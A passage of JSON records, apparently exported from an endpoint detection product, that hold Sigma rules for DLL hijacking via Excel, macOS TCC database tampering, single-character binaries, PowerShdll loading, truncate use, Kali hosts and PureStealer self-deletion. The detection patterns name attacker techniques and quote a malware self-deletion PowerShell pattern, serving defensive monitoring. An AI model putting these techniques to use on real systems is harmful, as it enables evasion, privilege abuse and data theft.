"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6474fd32-8cfd-41e6-b171-96fdd9a36020",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091937Z",
"creation_date": "2026-03-23T11:45:34.091939Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091944Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_excel.yml",
"content": "title: DLL Hijacking via Excel.exe\nid: 6474fd32-8cfd-41e6-b171-96fdd9a36020\ndescription: |\n Detects potential Windows DLL Hijacking via Excel.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Excel.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\directmanipulation.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6474fd32-8cfd-41e6-b171-96fdd9a36020",
"rule_name": "DLL Hijacking via Excel.exe",
"rule_description": "Detects potential Windows DLL hijacking via Excel.exe.\nDLL hijacking abuses the default Windows DLL search order by placing a malicious DLL in the same directory as a victim application, so that it is loaded instead of the legitimate library.\nAttackers use this technique by copying a legitimate executable to a directory they control and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content (path, signature, hash) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6480276d-6c1f-41b0-aa47-92423c017072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626586Z",
"creation_date": "2026-03-23T11:45:34.626588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626592Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/inital-research-of-jokerspy",
"https://attack.mitre.org/techniques/T1548/006/"
],
"name": "t1548_006_tcc_database_created_modified.yml",
"content": "title: Suspicious TCC Database Modification\nid: 6480276d-6c1f-41b0-aa47-92423c017072\ndescription: |\n Detects a suspicious modification of the Transparency, Consent, & Control (TCC) database.\n Adversaries may manipulate the TCC database to execute malicious content with privileged access.\n It is recommended to verify if the process performing the modification has legitimate reason to do so.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1548/006/\ndate: 2024/06/18\nmodified: 2026/01/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.006\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n # /Library/Application Support/com.apple.TCC/TCC.db\n # ~/Library/Application Support/com.apple.TCC/TCC.db\n - Path|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n - TargetPath|endswith: '/Library/Application Support/com.apple.TCC/TCC.db'\n\n selection_process:\n ProcessImage|contains: '?'\n\n filter_read:\n Kind: 'read'\n\n filter_tccd:\n - Image:\n - '/System/Library/PrivateFrameworks/TCC.framework/Support/tccd'\n - '/System/Library/PrivateFrameworks/TCC.framework/Versions/A/Resources/tccd'\n - ProcessImage:\n - '/System/Library/PrivateFrameworks/TCC.framework/Support/tccd'\n - '/System/Library/PrivateFrameworks/TCC.framework/Versions/A/Resources/tccd'\n\n filter_privateframework:\n Image:\n - 
'/System/Library/PrivateFrameworks/SystemAdministration.framework/XPCServices/writeconfig.xpc/Contents/MacOS/writeconfig'\n - '/System/Library/PrivateFrameworks/SystemAdministration.framework/Resources/DirectoryTools'\n\n exclusion_sophos:\n - Image: '/Library/Sophos Anti-Virus/SophosServiceManager.app/Contents/MacOS/SophosServiceManager'\n - ProcessImage: '/Library/Sophos Anti-Virus/SophosServiceManager.app/Contents/MacOS/SophosServiceManager'\n\n exclusion_landesk:\n Image: '/Library/Application Support/LANDesk/bin/ivEMH.app/Contents/MacOS/ivEMH'\n\n exclusion_splashtop:\n Image: '/usr/bin/sqlite3'\n ProcessCommandLine:\n - \"sqlite3 /Library/Application Support/com.apple.TCC/TCC.db SELECT auth_value from access WHERE client='com.splashtop.Splashtop-Streamer' AND service='kTCCServiceRemoteDesktop';\"\n - \"sqlite3 /Library/Application Support/com.apple.TCC/TCC.db SELECT auth_value from access WHERE client='com.splashtop.Splashtop-Streamer.daemon' AND service='kTCCServiceCamera';\"\n\n exclusion_cybereason:\n ProcessParentImage: '/Library/PreferencePanes/ActiveProbe.prefPane/Contents/MacOS/CybereasonAv.app/Contents/MacOS/CybereasonAv'\n ProcessCommandLine: 'sqlite3 /Library/Application Support/com.apple.TCC/TCC.db select * from access'\n\n exclusion_desktopserviceshelper:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.DesktopServicesHelper'\n\n exclusion_chown:\n ProcessImage: '/usr/sbin/chown'\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_logout:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.sessionlogoutd'\n\n exclusion_directory:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.DirectoryTools'\n\n exclusion_authorization_host:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.authorizationhost'\n\n exclusion_mcafee:\n Image:\n - '/usr/local/McAfee/fmp/bin/fmpd'\n - '/usr/local/McAfee/fmp/bin64/fmpd'\n\n exclusion_carbon_copy_cloner:\n ProcessSigned: 'true'\n 
ProcessSignatureSigningId:\n - 'com.bombich.ccchelper'\n - 'com.bombich.ccc'\n\n exclusion_netgear_antivirus:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.netgear.antivirusformac'\n\n exclusion_orange_antivirus:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.orangefr.antivirusformac'\n\n exclusion_jumpcloud:\n ProcessCommandLine: \"sqlite3 /Library/Application Support/com.apple.TCC/TCC.db select auth_value from access where service='kTCCServiceScreenCapture' and client='com.jumpcloud.assist-app'\"\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6480276d-6c1f-41b0-aa47-92423c017072",
"rule_name": "Suspicious TCC Database Modification",
"rule_description": "Detects a suspicious write to the Transparency, Consent, & Control (TCC) database (TCC.db), which records the privacy permissions granted to applications.\nAdversaries may tamper with the TCC database to grant their malicious code sensitive permissions (such as screen capture, camera or remote desktop access) without user consent, bypassing macOS privacy controls.\nUnder normal conditions only the tccd daemon writes to this database; it is recommended to verify that the process performing the modification has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-01-13",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64c30585-b56c-4b85-9210-f2f288bbf74f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296021Z",
"creation_date": "2026-03-23T11:45:35.296024Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296031Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_susp_single_char_executable.yml",
"content": "title: Single Character Binary Executed\nid: 64c30585-b56c-4b85-9210-f2f288bbf74f\ndescription: |\n Detects the execution of a single character executable.\n Adversaries may use short-name for their malicious binaries, such as 'm.exe' for Mimikatz or 'r.exe' for WinRar for defense evasion.\n It is recommended to verify the legitimacy of the binary.\nreferences:\n - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Modern-Asian-APT-groups-TTPs_report_eng.pdf\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/10/02\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessName|re: '^.\\....$'\n Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_r:\n - Description|contains: 'R for Windows'\n ProcessName: 'r.exe'\n - ProcessParentDescription|contains: 'R for Windows'\n - ProcessParentName: 'r.exe'\n ProcessName: 'r.tmp'\n - ProcessCommandLine|contains: '--slave -e IRkernel::main()'\n ProcessName: 'r.exe'\n\n exclusion_d5:\n ProcessName: '2.exe'\n ProcessSignature: 'D5 Inc.'\n\n exclusion_nvidia:\n ProcessName: '?.dat'\n ProcessParentImage: '?:\\Program Files\\NVIDIA Corporation\\NvContainer\\nvcontainer.exe'\n\n exclusion_echtherm:\n Image:\n - '?:\\Program Files\\EchTherm\\fscommand\\\\?.EXE'\n - '?:\\Program Files (x86)\\EchTherm\\fscommand\\\\?.EXE'\n\n exclusion_security_update:\n ProcessParentImage: '?:\\Windows\\System32\\wuauclt.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessSigned: 'true'\n 
ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_intunes:\n ProcessGrandparentImage:\n - '?:\\Program Files\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n\n exclusion_hp_connect:\n ProcessParentCommandLine:\n - '?:\\windows\\temp\\h.exe /log=* /destdir=?:\\Program Files\\HPConnect\\hp-cmsl-wl'\n - '?:\\windows\\temp\\h.exe /log=* /destdir=?:\\Program Files (x86)\\HPConnect\\hp-cmsl-wl'\n\n exclusion_unity:\n ProcessParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\appdata\\local\\temp\\is-rar*.tmp\\x.exe *\\data.unity3d *\\data.unity3d_*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64c30585-b56c-4b85-9210-f2f288bbf74f",
"rule_name": "Single Character Binary Executed",
"rule_description": "Detects the execution of an executable whose file name is a single character (e.g. 'a.exe').\nAdversaries may use such short names for their tooling to blend in and evade name-based detection, such as 'm.exe' for Mimikatz or 'r.exe' for WinRAR.\nIt is recommended to verify the legitimacy of the binary (signature, hash, path and parent process).\n",
"rule_creation_date": "2024-10-02",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64dc131a-601c-401c-a7e3-9e1968f77040",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609412Z",
"creation_date": "2026-03-23T11:45:34.609416Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609423Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/p3nt4/PowerShdll",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1059_001_powershdll_dll_loaded.yml",
"content": "title: Powershdll DLL Loaded\nid: 64dc131a-601c-401c-a7e3-9e1968f77040\ndescription: |\n Detects the loading of the Powershdll, allowing PowerShell script defense evasion.\n Attackers can use this tool to execute PowerShell scripts without spawning the PowerShell executable, allowing them to evade defensive measures.\n It is recommended to investigate the process loading the DLL to look for malicious content or actions.\nreferences:\n - https://github.com/p3nt4/PowerShdll\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1202/\ndate: 2022/10/11\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.Powershdll\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n - ImageLoaded|endswith: '\\PowerShdll.dll'\n - OriginalFileName: 'PowerShdll.dll'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64dc131a-601c-401c-a7e3-9e1968f77040",
"rule_name": "Powershdll DLL Loaded",
"rule_description": "Detects the loading of PowerShdll, a DLL that hosts the PowerShell engine so that scripts can run without launching the PowerShell executable.\nAttackers use this tool to execute PowerShell scripts from another host process, bypassing controls and logging tied to powershell.exe.\nIt is recommended to investigate the process that loaded the DLL for malicious content or actions.\n",
"rule_creation_date": "2022-10-11",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64f5ab15-4127-4a91-b2bc-5109aad8b014",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619524Z",
"creation_date": "2026-03-23T11:45:34.619526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619530Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md",
"https://attack.mitre.org/techniques/T1027/001/"
],
"name": "t1027_001_truncate_usage_macos.yml",
"content": "title: Truncate Usage\nid: 64f5ab15-4127-4a91-b2bc-5109aad8b014\ndescription: |\n Detects the usage of the truncate utility to perform binary padding or destruction.\n This could be used by an attacker to add junk data and change the on-disk representation of a malware or destroy data.\n It is recommended to investigate this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md\n - https://attack.mitre.org/techniques/T1027/001/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.001\n - attack.t1070.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Truncate\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/truncate'\n CommandLine|contains: ' -s'\n\n exclusion_podman:\n CommandLine|endswith:\n - '/truncate -s 0 /Users/*/Library/Logs/Podman Desktop/launchd-stderr.log'\n - '/truncate -s 0 /Users/*/Library/Logs/Podman Desktop/launchd-stdout.log'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64f5ab15-4127-4a91-b2bc-5109aad8b014",
"rule_name": "Truncate Usage",
"rule_description": "Detects the usage of the truncate utility to perform binary padding or destruction.\nThis could be used by an attacker to add junk data and change the on-disk representation of malware, or to destroy data.\nIt is recommended to investigate this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-21",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027.001",
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "64f64306-2713-43ab-a8e0-17fe9a81cca9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605083Z",
"creation_date": "2026-03-23T11:45:34.605086Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605093Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.kali.org",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_workstation_name_kali.yml",
"content": "title: Activity linked to Workstation Named Kali\nid: 64f64306-2713-43ab-a8e0-17fe9a81cca9\ndescription: |\n Detects an activity from a machine whose name is Kali, a widely used penetration testing Linux distribution.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://www.kali.org\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/06/04\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Kali\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation: 'KALI'\n - WorkstationName: 'KALI'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "64f64306-2713-43ab-a8e0-17fe9a81cca9",
"rule_name": "Activity linked to Workstation Named Kali",
"rule_description": "Detects activity from a machine named Kali, a widely used penetration-testing Linux distribution.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check whether the machine is expected on the network and to look for other malicious activity from the machine's IP address.\n",
"rule_creation_date": "2025-06-04",
"rule_modified_date": "2025-06-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65122d48-ae12-409c-ad44-7bc0372b68f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610737Z",
"creation_date": "2026-03-23T11:45:34.610741Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/",
"https://attack.mitre.org/techniques/T1587/001/",
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1087/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1587_001_purestealer_usage.yml",
"content": "title: Self-Deletion PowerShell Command linked to PureStealer\nid: 65122d48-ae12-409c-ad44-7bc0372b68f3\ndescription: |\n Detects a suspicious PowerShell command-line associated with the PureStealer malware self-deletion mechanism.\n PureStealer is a malware designed to steal credentials from victims' devices including banking information, crypto wallets and browser credentials.\n It is cheaply provided in darkweb forums and has been widely used in spam campaigns across Europe.\n Look for batch executions and downloaded documents preceding this alert to find the original infection vector.\n It is recommended to investigate compromised materials and credentials as well as to reset accounts of any compromised users.\nreferences:\n - https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/\n - https://attack.mitre.org/techniques/T1587/001/\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2023/01/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1587.001\n - attack.t1539\n - attack.t1087\n - attack.t1095\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Stealer.PureStealer\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ProcessGrandparentCommandLine|contains:\n - 'cmd.exe /c *.bat'\n - 'cmd.exe /c *.exe'\n ProcessParentImage|endswith: '\\\\Local\\\\Temp\\\\*.exe'\n PowershellCommand|contains: 'Start-Sleep -s *; Remove-Item -Path \"*\\\\Local\\\\Temp\\\\*.exe\" -Force'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65122d48-ae12-409c-ad44-7bc0372b68f3",
"rule_name": "Self-Deletion PowerShell Command linked to PureStealer",
"rule_description": "Detects a suspicious PowerShell command-line associated with the PureStealer malware self-deletion mechanism.\nPureStealer is a malware designed to steal credentials from victims' devices including banking information, crypto wallets and browser credentials.\nIt is cheaply provided in darkweb forums and has been widely used in spam campaigns across Europe.\nLook for batch executions and downloaded documents preceding this alert to find the original infection vector.\nIt is recommended to investigate compromised materials and credentials as well as to reset accounts of any compromised users.\n",
"rule_creation_date": "2023-01-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1087",
"attack.t1095",
"attack.t1539",
"attack.t1587.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6519f41d-2b23-494d-b1c5-dee52a5166d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080067Z",
"creation_date": "2026-03-23T11:45:34.080069Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080074Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
